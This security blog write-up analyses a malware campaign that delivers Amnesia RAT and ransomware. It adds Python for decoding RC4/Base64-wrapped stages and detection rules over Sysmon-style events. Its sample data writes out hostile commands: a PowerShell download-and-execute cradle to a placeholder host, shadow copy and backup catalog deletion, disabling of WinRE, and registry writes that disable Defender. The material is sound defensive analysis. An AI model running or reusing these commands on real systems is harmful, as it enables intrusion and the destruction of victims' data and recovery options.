Multi‑stage malware campaign abuses legitimate tools and delivers ransomware and Amnesia RAT
- Security Team

- 10 hours ago
- 4 min read


The ICS CTI team has identified a sophisticated, multi-stage malware campaign primarily targeting users in Russia. The operation stands out for its extensive use of social engineering, abuse of legitimate Windows tools, and abuse of widely trusted services such as GitHub and Dropbox for hosting malicious payloads.
The attack begins with seemingly harmless documents presented as routine work materials and quickly escalates to a full system compromise, involving espionage, the disabling of security mechanisms, deployment of backdoors, ransomware, and a WinLocker to completely lock the machine.
Social engineering as the entry point
The initial infection vector is an archive containing several fake documents, such as text files and spreadsheets with Russian-language names relating to financial and accounting tasks. These files serve as lures, reinforcing the appearance of legitimacy and increasing the likelihood that the victim interacts with them.
The most notable item in the package is a malicious shortcut (.LNK) disguised as a plain text document. When opened, it launches PowerShell with the execution policy bypassed, downloads a script hosted on GitHub, and executes it directly. No vulnerability is exploited at this stage; the attack relies entirely on user action.
Multi‑layered scripts and silent execution
The initial PowerShell script acts as a lightweight loader, responsible for hiding its execution, creating a decoy document with fake work instructions, and opening this file automatically to keep the user distracted. Meanwhile, the actual malicious execution occurs in the background.
As confirmation of success, the script sends basic information from the compromised system to the attackers via the Telegram API. After an intentional delay, it downloads a second‑stage VBScript, heavily obfuscated with commercial tools and custom encryption routines to hinder detection and static analysis.
This second stage acts as the campaign's central orchestrator. It reconstructs the final code only in memory, decoding it from Base64 and then decrypting it with RC4, before executing the real payload, so the decrypted stage is never written to disk in plaintext.
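The Base64 + RC4 wrapping described above is simple to undo once the key has been pulled out of the obfuscated VBScript, which lets an analyst recover the in-memory stage offline rather than detonating it. The following is an added example written for this write-up, not code from the original report or from the campaign; the key, the stand-in payload and the blob are all constructed here, and the real key, layout and payload are not known from the report.

```python
"""Recover a staged payload wrapped as Base64(RC4(plaintext)).

Added example for this write-up, not code from the original report or from the
campaign: it reproduces the Base64 + RC4 wrapping the second stage is described
as using, so an analyst who has pulled the key out of the VBScript can decode a
recovered blob offline instead of letting it run. The key, the stand-in payload
and the blob below are constructed here; the campaign's real key, layout and
payload are not known from the report.
"""
import base64


def rc4_keystream(key: bytes):
    """Yield RC4 keystream bytes: key scheduling (KSA) followed by the PRGA loop."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    i = j = 0
    while True:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        yield S[(S[i] + S[j]) & 0xFF]


def rc4(key: bytes, data: bytes) -> bytes:
    """XOR data with the keystream; RC4 is symmetric, so this both encrypts and decrypts."""
    ks = rc4_keystream(key)
    return bytes(b ^ next(ks) for b in data)


def wrap_stage(key: bytes, payload: bytes) -> str:
    """Loader side: RC4-encrypt, then Base64 so the blob can sit inside a script as text."""
    return base64.b64encode(rc4(key, payload)).decode("ascii")


def unwrap_stage(key: bytes, blob: str) -> bytes:
    """Analyst side: undo the Base64 layer, then RC4 with the recovered key."""
    return rc4(key, base64.b64decode(blob))


def looks_like_script(data: bytes) -> bool:
    """Cheap plausibility check on a decode attempt: a correct key yields printable text."""
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        return False
    return all(c.isprintable() or c in "\r\n\t" for c in text)


# Constructed sample (hypothetical key and payload, not the campaign's).
SAMPLE_KEY = b"k3y-recovered-from-vbs"
SAMPLE_PAYLOAD = (
    b"powershell -w hidden -ep bypass -c "
    b"\"iex (New-Object Net.WebClient).DownloadString('https://example.invalid/stage3.ps1')\""
)
SAMPLE_BLOB = wrap_stage(SAMPLE_KEY, SAMPLE_PAYLOAD)

if __name__ == "__main__":
    recovered = unwrap_stage(SAMPLE_KEY, SAMPLE_BLOB)
    print("recovered:", recovered.decode())
    print("plausible:", looks_like_script(recovered))
    print("wrong key plausible:", looks_like_script(unwrap_stage(b"wrong-key", SAMPLE_BLOB)))
```

Against a real sample, the blob and the key both have to be lifted from the deobfuscated VBScript (the key is often assembled at runtime from string fragments, so it may be easier to read it out of a debugger than to reconstruct it statically). The `looks_like_script` check is only a sanity filter for candidate keys: RC4 gives no integrity check, so a wrong key silently yields garbage rather than an error.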
Privilege escalation and defense neutralization
Before proceeding to more aggressive actions, the malware checks whether it is running with administrative privileges. If not, it repeatedly triggers UAC elevation prompts, looping until elevated access is granted.
With privileges secured, the campaign begins a phase dedicated to neutralizing defenses. Microsoft Defender is progressively disabled through PowerShell commands, registry changes, and the deliberate removal of widely used system directories from its coverage. This drastically reduces the ability to detect malicious files and behavior.
One of the most important aspects is the operational use of the Defendnot tool, originally created as a proof of concept to demonstrate weaknesses in the Windows Security Center trust model. The attackers use it to register a fake antivirus product on the system, which causes Windows to disable Microsoft Defender automatically without directly stopping its services. Because those services keep running, a check that looks only at service state will report nothing wrong; the products registered in Windows Security Center (the root\SecurityCenter2 WMI namespace) have to be reviewed as well.
Espionage and information gathering
With defenses neutralized, the attack enters a reconnaissance and active surveillance phase. Detailed information about the system, user, hardware, and network is collected and sent to the attackers via Telegram.
Additionally, a module is deployed to capture screenshots of the victim’s screen at regular intervals for about fifteen minutes. The images are exfiltrated almost in real time, allowing operators to observe user activity and assess the target’s value.
System lockdown and removal of recovery options
To prevent any response or remediation attempt, the malware applies a series of restrictions to the operating system. Administrative tools like Registry Editor, Task Manager, Control Panel, and configuration utilities are disabled through registry policies.
In parallel, recovery mechanisms are destroyed: the Windows Recovery Environment is disabled, backup catalogs are deleted, and all Volume Shadow Copies are removed. These actions make system recovery extremely difficult without a complete reinstallation.
The attack also changes Windows file associations, preventing the opening of executables, documents, images, and several other formats. When attempting to open any file, the victim receives a message instructing them to contact the attackers via Telegram.
Amnesia RAT, ransomware, and WinLocker
In the final stage, the campaign delivers multiple high‑impact payloads. The main one is Amnesia RAT, distributed from Dropbox and disguised as a legitimate system file. The malware provides full remote control, extensive credential theft, Telegram session hijacking, browser data theft, cryptocurrency wallet theft, and continuous monitoring of user activity.
Next, ransomware derived from the Hakuna Matata family is executed, encrypting files with a custom extension and leaving ransom notes in Russian. The malware also terminates critical processes, changes the wallpaper, and includes clipbanker functionality that swaps cryptocurrency addresses copied to the clipboard for attacker-controlled ones.
Finally, a WinLocker component is activated, completely locking the system interface and displaying messages pressuring the victim to contact the attackers within a limited timeframe.
Final considerations
This campaign demonstrates how modern attacks can achieve full compromise without exploiting technical vulnerabilities, relying solely on social engineering, legitimate services, and native operating system features. The abuse of platforms like GitHub, Dropbox, and Telegram helps malicious traffic blend with legitimate activity, complicating detection and response.
This case reinforces the importance of monitoring unexpected changes in security configurations, system policies, persistence mechanisms, and anomalous use of administrative tools. Once defenses and recovery options are neutralized, the impact escalates rapidly and containment becomes extremely limited.
Mitigation and Defense Recommendations
- Block or restrict execution of .LNK files from user-writable locations (Downloads, Desktop, Temp)
- Restrict execution of PowerShell and VBScript (wscript.exe, cscript.exe) via AppLocker, WDAC, or equivalent policies
- Monitor PowerShell invocations that combine -ExecutionPolicy Bypass, hidden windows, and Invoke-Expression (iex) or download cradles
- Enable and monitor advanced PowerShell logging (Script Block Logging and Module Logging)
- Detect and alert on changes to Microsoft Defender settings, including policy keys that disable it
- Monitor the creation of broad directory exclusions in Defender (for example, entire drive roots)
- Investigate unexpected registration of new security products in Windows Security Center (root\SecurityCenter2)
- Monitor usage of native administrative tools (vssadmin, wbadmin, reagentc, gpupdate), in particular shadow copy deletion, backup catalog deletion, and disabling of WinRE
- Monitor modifications to the policy registry keys that disable Registry Editor, Task Manager, and Control Panel
- Detect mass changes to file associations in the registry (HKCR)
- Monitor creation and execution of .scr files outside legitimate contexts
- Ensure offline or immutable backups and test restoration regularly
- Prioritize EDR solutions with behavioral detection and automated response
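Most of the recommendations above, and the defense-neutralization and lockdown phases they respond to, reduce to a small set of rules over process-creation and registry telemetry. The block below is an added example written for this write-up, not code from the original report or from any vendor product: it runs those rules over constructed Sysmon-style events (ID 1 process creation carrying a CommandLine, ID 13 registry value set carrying a TargetObject and Details) and over a constructed list of products registered in root\SecurityCenter2. The field names, sample command lines, registry paths, thresholds and the antivirus allowlist are all assumptions made for the example.

```python
"""Detection rules for the host-side tradecraft in the recommendations.

Added example, not code from the original report or any vendor product. It runs
a few rules over constructed Sysmon-style events (ID 1 process creation with a
CommandLine, ID 13 registry value set with TargetObject/Details) and over a
constructed root\\SecurityCenter2 product inventory. Field names, sample command
lines, registry paths, thresholds and the AV allowlist are assumptions.
"""
import re
from collections import defaultdict

# Command-line rules, applied to the lower-cased CommandLine of ID 1 events.
CMDLINE_RULES = {
    "powershell_download_cradle": re.compile(
        r"powershell.*(-ep\s+bypass|-executionpolicy\s+bypass).*"
        r"(\biex\b|invoke-expression|downloadstring|invoke-webrequest|\birm\b)"),
    "shadow_copy_or_backup_deletion": re.compile(
        r"vssadmin.*delete\s+shadows|wmic.*shadowcopy\s+delete|wbadmin.*delete\s+catalog"),
    "winre_disabled": re.compile(r"reagentc.*/disable|bcdedit.*recoveryenabled\s+no"),
}
DWORD_ONE = re.compile(r"0x0*1\)?$")  # Sysmon renders DWORD values as "DWORD (0x00000001)"
# Registry rules: (TargetObject regex, optional Details regex), both on lower-cased input.
REGISTRY_RULES = {
    "defender_policy_disable": (
        re.compile(r"\\policies\\microsoft\\windows defender\\disableantispyware$"), DWORD_ONE),
    # A drive-root exclusion (Exclusions\Paths\C:\) removes almost everything from scanning.
    "defender_broad_exclusion": (
        re.compile(r"\\windows defender\\exclusions\\paths\\[a-z]:\\?$"), None),
    "admin_tools_disabled_by_policy": (
        re.compile(r"\\policies\\(system\\disable(registrytools|taskmgr)|explorer\\nocontrolpanel)$"),
        DWORD_ONE),
}
HKCR_OPEN_COMMAND = re.compile(r"^hkcr\\([^\\]+)\\shell\\open\\command", re.I)
KNOWN_AV_PRODUCTS = {"windows defender"}  # assumed allowlist for this environment


def hkcr_mass_rewrite(events, window=60, threshold=5):
    """Return [(pid, n)] for processes that rewrite >= threshold ProgID open commands within `window` s."""
    per_pid = defaultdict(list)
    for e in events:
        m = e["id"] == 13 and HKCR_OPEN_COMMAND.match(e["TargetObject"])
        if m:
            per_pid[e["pid"]].append((e["ts"], m.group(1).lower()))
    hits = []
    for pid, items in per_pid.items():
        items.sort()
        for i, (t0, _) in enumerate(items):
            progids = {p for t, p in items[i:] if t - t0 <= window}
            if len(progids) >= threshold:
                hits.append((pid, len(progids)))
                break
    return hits


def unknown_security_products(registered):
    """Flag AntiVirusProduct display names outside the allowlist (fake-AV registration, as Defendnot does)."""
    return sorted(p for p in registered if p.strip().lower() not in KNOWN_AV_PRODUCTS)


def scan_events(events):
    """Return sorted (rule, pid) pairs for every rule that fired."""
    findings = set()
    for e in events:
        if e["id"] == 1:
            cl = e["CommandLine"].lower()
            findings.update((n, e["pid"]) for n, rx in CMDLINE_RULES.items() if rx.search(cl))
        elif e["id"] == 13:
            tgt, det = e["TargetObject"].lower(), e.get("Details", "").lower()
            for n, (rx_t, rx_d) in REGISTRY_RULES.items():
                if rx_t.search(tgt) and (rx_d is None or rx_d.search(det)):
                    findings.add((n, e["pid"]))
    findings.update(("file_association_mass_rewrite", pid) for pid, _ in hkcr_mass_rewrite(events))
    return sorted(findings)


# Constructed sample telemetry (not from the campaign); pids 4500 and 4600 are benign controls.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"id": 1, "ts": 100, "pid": 4100, "Image": PS, "CommandLine":
        "powershell.exe -w hidden -ExecutionPolicy Bypass -c \"iex ((New-Object Net.WebClient)"
        ".DownloadString('https://raw.githubusercontent.com/example/repo/main/s.ps1'))\""},
    {"id": 13, "ts": 130, "pid": 4200, "Details": "DWORD (0x00000001)",
     "TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware"},
    {"id": 13, "ts": 131, "pid": 4200, "Details": "DWORD (0x00000000)",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\"},
    {"id": 1, "ts": 200, "pid": 4300, "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    {"id": 1, "ts": 201, "pid": 4301, "Image": r"C:\Windows\System32\wbadmin.exe",
     "CommandLine": "wbadmin delete catalog -quiet"},
    {"id": 1, "ts": 202, "pid": 4302, "Image": r"C:\Windows\System32\ReAgentc.exe",
     "CommandLine": "reagentc.exe /disable"},
    {"id": 13, "ts": 300, "pid": 4400, "Details": "DWORD (0x00000001)", "TargetObject":
        r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr"},
    {"id": 1, "ts": 400, "pid": 4500, "Image": PS,
     "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1"},
    {"id": 13, "ts": 500, "pid": 4600, "TargetObject": r"HKCR\MyApp.Document\shell\open\command\(Default)",
     "Details": r'C:\Program Files\MyApp\myapp.exe "%1"'},
] + [  # one process rewriting six common ProgIDs within a few seconds
    {"id": 13, "ts": 301 + i, "pid": 4400, "Details": r'wscript.exe C:\ProgramData\notice.vbs "%1"',
     "TargetObject": "HKCR\\" + p + r"\shell\open\command\(Default)"}
    for i, p in enumerate(["txtfile", "exefile", "jpegfile", "Word.Document.12", "htmlfile", "pngfile"])
]

if __name__ == "__main__":
    for rule, pid in scan_events(SAMPLE_EVENTS):
        print(f"{rule:34} pid={pid}")
    print("unknown AV products:", unknown_security_products(["Windows Defender", "Acme Shield AV"]))
```

Two design points carry over to a real deployment. The Defender policy and exclusion rules fire on the registry write itself, not on Defender's resulting state, so they still produce a signal when the product is silenced through Security Center rather than stopped; the `unknown_security_products` check covers the Security Center side, and its input would come from the AntiVirusProduct class in root\SecurityCenter2. The file-association rule is deliberately volume-based: a single ProgID change is routine software installation, while one process rewriting several common ProgIDs within a minute matches the lockdown behavior described above, so the window and threshold should be tuned to the environment's installer noise.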